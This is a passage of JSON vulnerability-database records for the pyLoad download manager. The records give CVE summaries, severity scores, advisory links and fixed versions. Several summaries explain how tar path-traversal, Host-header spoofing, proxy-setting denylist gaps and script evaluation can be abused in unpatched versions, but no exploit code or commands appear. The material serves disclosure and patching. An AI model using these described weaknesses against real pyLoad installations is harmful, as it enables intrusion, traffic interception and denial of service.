Version 0.5.0b3.dev87 fixes this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47821","reference_id":"","reference_type":"","scores":[{"value":"0.01807","scoring_system":"epss","scoring_elements":"0.83225","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47821"},{"reference_url":"https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-302.yaml","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-302.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47821","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47821"},{"reference_url":"https://github.com/ad
visories/GHSA-w7hq-f2pj-c53g","reference_id":"GHSA-w7hq-f2pj-c53g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-w7hq-f2pj-c53g"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g","reference_id":"GHSA-w7hq-f2pj-c53g","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-28T17:19:04Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91193?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-
u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87"}],"aliases":["CVE-2024-47821","GHSA-w7hq-f2pj-c53g","PYSEC-2024-302"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-64ux-jb56-gub5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71603?format=json","vulnerability_id":"VCID-72ar-7tmw-ybcy","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. 
This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35592","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18386","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35592"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-124.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-124.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35592","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35592"},{"reference_url":"https://github.com/advisories/GHSA-mvwx-582f-56r7","reference_id":"GHSA-mvwx-582f-56r7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvwx-582f-56r7"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7","reference_id":"GHSA-mvwx-582f-56r7","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc"
,"scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:58:13Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-35592","GHSA-mvwx-582f-56r7","PYSEC-2026-124"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-72ar-7tmw-ybcy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/120952?format=json","vulnerability_id":"VCID-7uc5-ppjr-yqfj","summary":"pyLoad is the free and open-source Download Manager written in pure Python. The jk parameter is received by the pyLoad CNL (Click'N'Load) Blueprint. Because the jk parameter is not validated, the user-supplied value is passed directly to dykpy.evaljs() for evaluation, so a crafted script can keep the server CPU fully occupied and leave the web-ui unresponsive. The CNL endpoints are nominally restricted to local clients, but CVE-2025-7346 and CVE-2026-33314 on this page describe bypasses of that restriction in affected versions. 
This vulnerability is fixed in 0.5.0b3.dev92.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57751","reference_id":"","reference_type":"","scores":[{"value":"0.00121","scoring_system":"epss","scoring_elements":"0.30684","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-57751"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57751","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-57751"},{"reference_url":"https://github.com/advisories/GHSA-9gjj-6gj7-c4wj","reference_id":"GHSA-9gjj-6gj7-c4wj","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9gjj-6gj7-c4wj"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj","reference_id":"GHSA-9gjj-6gj7-c4wj","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-21T18:40:14Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91197?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev92","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43
a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev92"}],"aliases":["CVE-2025-57751","GHSA-9gjj-6gj7-c4wj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7uc5-ppjr-yqfj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/78115?format=json","vulnerability_id":"VCID-865y-shjm-xqam","summary":"pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions: the Host header is chosen by the client, so any remote client can present a localhost value, whereas a local-only check has to rely on the connection's peer address. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). Note that behind a reverse proxy a peer-address check only sees the proxy, so forwarded-address handling must be configured deliberately rather than trusting arbitrary X-Forwarded-For values. 
This issue has been patched in version 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33314","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01582","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33314"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-122.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-122.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33314","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33314"},{"reference_url":"https://github.com/advisories/GHSA-q485-cg9q-xq2r","reference_id":"GHSA-q485-cg9q-xq2r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q485-cg9q-xq2r"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r","reference_id":"GHSA-q485-cg9q-xq2r","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:33:35Z/"}],"url":"https://github
.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-33314","GHSA-q485-cg9q-xq2r","PYSEC-2026-122"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-865y-shjm-xqam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70499?format=json","vulnerability_id":"VCID-8hzh-53hk-6yaz","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind ADMIN_ONLY_CORE_OPTIONS, a hand-maintained list of the (section, option) pairs that only admins may change; any pair missing from that list is writable by every user with SETTINGS permission, so the list behaves as a denylist and each omission is a bypass. The list contains (\"proxy\", \"username\") and (\"proxy\", \"password\") — which protect the proxy credentials — but it does not include (\"proxy\", \"enabled\"), (\"proxy\", \"host\"), (\"proxy\", \"port\"), or (\"proxy\", \"type\"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker, who can observe and tamper with that traffic in transit. A default-deny rule, under which non-admins may change only an explicit allowlist of known-safe options, would close the whole class rather than one option per advisory. 
This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42313","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.04091","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42313"},{"reference_url":"https://github.com/advisories/GHSA-4744-96p5-mp2j","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7"},{"reference_url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx"},{"reference_url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr"},{"reference_
url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-127.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-127.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42313","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42313"},{"reference_url":"https://github.com/advisories/GHSA-pg67-9wjv-mr85","reference_id":"GHSA-pg67-9wjv-mr85","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg67-9wjv-mr85"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85","reference_id":"GHSA-pg67-9wjv-mr85","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:50:29Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42313","GHSA-pg67-9wjv-mr85",
"PYSEC-2026-127"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8hzh-53hk-6yaz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359592?format=json","vulnerability_id":"VCID-bby9-fzzw-myhs","summary":"Duplicate Advisory: pyload-ng vulnerable to RCE with js2py sandbox escape\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-r9pp-r4xf-597r. This link is maintained to preserve external references.\n\n## Original Description\nAn issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.","references":[{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205","reference_id":"CVE-2024-39205","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205"},{"reference_url":"https://github.com/advisories/GHSA-25pw-q952-x37g","reference_id":"GHSA-25pw-q952-x37g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-25pw-q952-x37g"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/91193?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-
yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87"}],"aliases":["GHSA-25pw-q952-x37g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bby9-fzzw-myhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/106511?format=json","vulnerability_id":"VCID-bfu1-1u68-47bw","summary":"Any unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary 
packages","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-7346","reference_id":"","reference_type":"","scores":[{"value":"0.00739","scoring_system":"epss","scoring_elements":"0.73328","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-7346"},{"reference_url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L21-L36"},{"reference_url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/blob/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d/src/pyload/webui/app/blueprints/cnl_blueprint.py#L56-L58C11"},{"reference_url":"https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/f4e2d12416ba2dfac7b036d5c8d6dab5461b9840"},{"reference_url":"https://github.com/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-x698-5h
jm-w2m5"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-08T14:13:19Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5"}],"fixed_packages":[],"aliases":["CVE-2025-7346","GHSA-x698-5hjm-w2m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bfu1-1u68-47bw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/147801?format=json","vulnerability_id":"VCID-d2gv-3uu7-gudh","summary":"pyLoad 0.5.0 is vulnerable to Unrestricted File 
